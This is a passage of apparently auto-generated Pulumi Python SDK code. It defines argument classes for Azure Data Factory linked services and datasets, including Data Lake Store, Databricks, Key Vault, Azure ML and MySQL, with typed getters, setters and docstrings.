:param Any subscription_id: Data Lake Store account subscription ID (if different from Data Factory account). Type: string (or Expression with resultType string).
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "data_lake_store_uri", data_lake_store_uri)
pulumi.set(__self__, "type", 'AzureDataLakeStore')
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if subscription_id is not None:
pulumi.set(__self__, "subscription_id", subscription_id)
if tenant is not None:
pulumi.set(__self__, "tenant", tenant)
@property
@pulumi.getter(name="dataLakeStoreUri")
def data_lake_store_uri(self) -> Any:
"""
Data Lake Store service URI. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "data_lake_store_uri")
@data_lake_store_uri.setter
def data_lake_store_uri(self, value: Any):
pulumi.set(self, "data_lake_store_uri", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[Any]:
"""
Data Lake Store account name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[Any]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[Any]:
"""
Data Lake Store account resource group name (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[Any]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the application used to authenticate against the Azure Data Lake Store account. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The Key of the application used to authenticate against the Azure Data Lake Store account.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> Optional[Any]:
"""
Data Lake Store account subscription ID (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "subscription_id")
@subscription_id.setter
def subscription_id(self, value: Optional[Any]):
pulumi.set(self, "subscription_id", value)
@property
@pulumi.getter
def tenant(self) -> Optional[Any]:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Optional[Any]):
pulumi.set(self, "tenant", value)
@pulumi.input_type
class AzureDatabricksLinkedServiceArgs:
def __init__(__self__, *,
access_token: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
domain: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
existing_cluster_id: Optional[Any] = None,
new_cluster_node_type: Optional[Any] = None,
new_cluster_num_of_worker: Optional[Any] = None,
new_cluster_spark_conf: Optional[pulumi.Input[Mapping[str, Any]]] = None,
new_cluster_version: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure Databricks linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: Access token for databricks REST API. Refer to https://docs.azuredatabricks.net/api/latest/authentication.html. Type: string (or Expression with resultType string).
:param Any domain: <REGION>.azuredatabricks.net, domain name of your Databricks deployment. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any existing_cluster_id: The id of an existing cluster that will be used for all runs of this job. Type: string (or Expression with resultType string).
:param Any new_cluster_node_type: The node types of new cluster. Type: string (or Expression with resultType string).
:param Any new_cluster_num_of_worker: Number of worker nodes that new cluster should have. A string formatted Int32, like '1' means numOfWorker is 1 or '1:10' means auto-scale from 1 as min and 10 as max. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, Any]] new_cluster_spark_conf: a set of optional, user-specified Spark configuration key-value pairs.
:param Any new_cluster_version: The Spark version of new cluster. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "access_token", access_token)
pulumi.set(__self__, "domain", domain)
pulumi.set(__self__, "type", 'AzureDatabricks')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if existing_cluster_id is not None:
pulumi.set(__self__, "existing_cluster_id", existing_cluster_id)
if new_cluster_node_type is not None:
pulumi.set(__self__, "new_cluster_node_type", new_cluster_node_type)
if new_cluster_num_of_worker is not None:
pulumi.set(__self__, "new_cluster_num_of_worker", new_cluster_num_of_worker)
if new_cluster_spark_conf is not None:
pulumi.set(__self__, "new_cluster_spark_conf", new_cluster_spark_conf)
if new_cluster_version is not None:
pulumi.set(__self__, "new_cluster_version", new_cluster_version)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
Access token for databricks REST API. Refer to https://docs.azuredatabricks.net/api/latest/authentication.html. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def domain(self) -> Any:
"""
<REGION>.azuredatabricks.net, domain name of your Databricks deployment. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Any):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="existingClusterId")
def existing_cluster_id(self) -> Optional[Any]:
"""
The id of an existing cluster that will be used for all runs of this job. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "existing_cluster_id")
@existing_cluster_id.setter
def existing_cluster_id(self, value: Optional[Any]):
pulumi.set(self, "existing_cluster_id", value)
@property
@pulumi.getter(name="newClusterNodeType")
def new_cluster_node_type(self) -> Optional[Any]:
"""
The node types of new cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "new_cluster_node_type")
@new_cluster_node_type.setter
def new_cluster_node_type(self, value: Optional[Any]):
pulumi.set(self, "new_cluster_node_type", value)
@property
@pulumi.getter(name="newClusterNumOfWorker")
def new_cluster_num_of_worker(self) -> Optional[Any]:
"""
Number of worker nodes that new cluster should have. A string formatted Int32, like '1' means numOfWorker is 1 or '1:10' means auto-scale from 1 as min and 10 as max. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "new_cluster_num_of_worker")
@new_cluster_num_of_worker.setter
def new_cluster_num_of_worker(self, value: Optional[Any]):
pulumi.set(self, "new_cluster_num_of_worker", value)
@property
@pulumi.getter(name="newClusterSparkConf")
def new_cluster_spark_conf(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
a set of optional, user-specified Spark configuration key-value pairs.
"""
return pulumi.get(self, "new_cluster_spark_conf")
@new_cluster_spark_conf.setter
def new_cluster_spark_conf(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "new_cluster_spark_conf", value)
@property
@pulumi.getter(name="newClusterVersion")
def new_cluster_version(self) -> Optional[Any]:
"""
The Spark version of new cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "new_cluster_version")
@new_cluster_version.setter
def new_cluster_version(self, value: Optional[Any]):
pulumi.set(self, "new_cluster_version", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureKeyVaultLinkedServiceArgs:
def __init__(__self__, *,
base_url: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure Key Vault linked service.
:param Any base_url: The base URL of the Azure Key Vault. e.g. https://myakv.vault.azure.net Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "base_url", base_url)
pulumi.set(__self__, "type", 'AzureKeyVault')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="baseUrl")
def base_url(self) -> Any:
"""
The base URL of the Azure Key Vault. e.g. https://myakv.vault.azure.net Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "base_url")
@base_url.setter
def base_url(self, value: Any):
pulumi.set(self, "base_url", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureKeyVaultSecretReferenceArgs:
def __init__(__self__, *,
secret_name: Any,
store: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
secret_version: Optional[Any] = None):
"""
Azure Key Vault secret reference.
:param Any secret_name: The name of the secret in Azure Key Vault. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] store: The Azure Key Vault linked service reference.
:param pulumi.Input[str] type: Type of the secret.
:param Any secret_version: The version of the secret in Azure Key Vault. The default value is the latest version of the secret. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "secret_name", secret_name)
pulumi.set(__self__, "store", store)
pulumi.set(__self__, "type", 'AzureKeyVaultSecret')
if secret_version is not None:
pulumi.set(__self__, "secret_version", secret_version)
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> Any:
"""
The name of the secret in Azure Key Vault. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "secret_name")
@secret_name.setter
def secret_name(self, value: Any):
pulumi.set(self, "secret_name", value)
@property
@pulumi.getter
def store(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
The Azure Key Vault linked service reference.
"""
return pulumi.get(self, "store")
@store.setter
def store(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "store", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of the secret.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="secretVersion")
def secret_version(self) -> Optional[Any]:
"""
The version of the secret in Azure Key Vault. The default value is the latest version of the secret. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "secret_version")
@secret_version.setter
def secret_version(self, value: Optional[Any]):
pulumi.set(self, "secret_version", value)
@pulumi.input_type
class AzureMLLinkedServiceArgs:
def __init__(__self__, *,
api_key: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
ml_endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
tenant: Optional[Any] = None,
update_resource_endpoint: Optional[Any] = None):
"""
Azure ML Web Service linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] api_key: The API key for accessing the Azure ML model endpoint.
:param Any ml_endpoint: The Batch Execution REST URL for an Azure ML Web Service endpoint. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any service_principal_id: The ID of the service principal used to authenticate against the ARM-based updateResourceEndpoint of an Azure ML web service. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key of the service principal used to authenticate against the ARM-based updateResourceEndpoint of an Azure ML web service.
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
:param Any update_resource_endpoint: The Update Resource REST URL for an Azure ML Web Service endpoint. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "api_key", api_key)
pulumi.set(__self__, "ml_endpoint", ml_endpoint)
pulumi.set(__self__, "type", 'AzureML')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if tenant is not None:
pulumi.set(__self__, "tenant", tenant)
if update_resource_endpoint is not None:
pulumi.set(__self__, "update_resource_endpoint", update_resource_endpoint)
@property
@pulumi.getter(name="apiKey")
def api_key(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The API key for accessing the Azure ML model endpoint.
"""
return pulumi.get(self, "api_key")
@api_key.setter
def api_key(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "api_key", value)
@property
@pulumi.getter(name="mlEndpoint")
def ml_endpoint(self) -> Any:
"""
The Batch Execution REST URL for an Azure ML Web Service endpoint. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "ml_endpoint")
@ml_endpoint.setter
def ml_endpoint(self, value: Any):
pulumi.set(self, "ml_endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the service principal used to authenticate against the ARM-based updateResourceEndpoint of an Azure ML web service. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key of the service principal used to authenticate against the ARM-based updateResourceEndpoint of an Azure ML web service.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter
def tenant(self) -> Optional[Any]:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Optional[Any]):
pulumi.set(self, "tenant", value)
@property
@pulumi.getter(name="updateResourceEndpoint")
def update_resource_endpoint(self) -> Optional[Any]:
"""
The Update Resource REST URL for an Azure ML Web Service endpoint. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "update_resource_endpoint")
@update_resource_endpoint.setter
def update_resource_endpoint(self, value: Optional[Any]):
pulumi.set(self, "update_resource_endpoint", value)
@pulumi.input_type
class AzureMySqlLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure MySQL database linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'AzureMySql')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureMySqlTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None,
table_name: Optional[Any] = None):
"""
The Azure MySQL database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any table_name: The Azure MySQL database table name. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzureMySqlTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if table_name is not None:
pulumi.set(__self__, "table_name", table_name)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
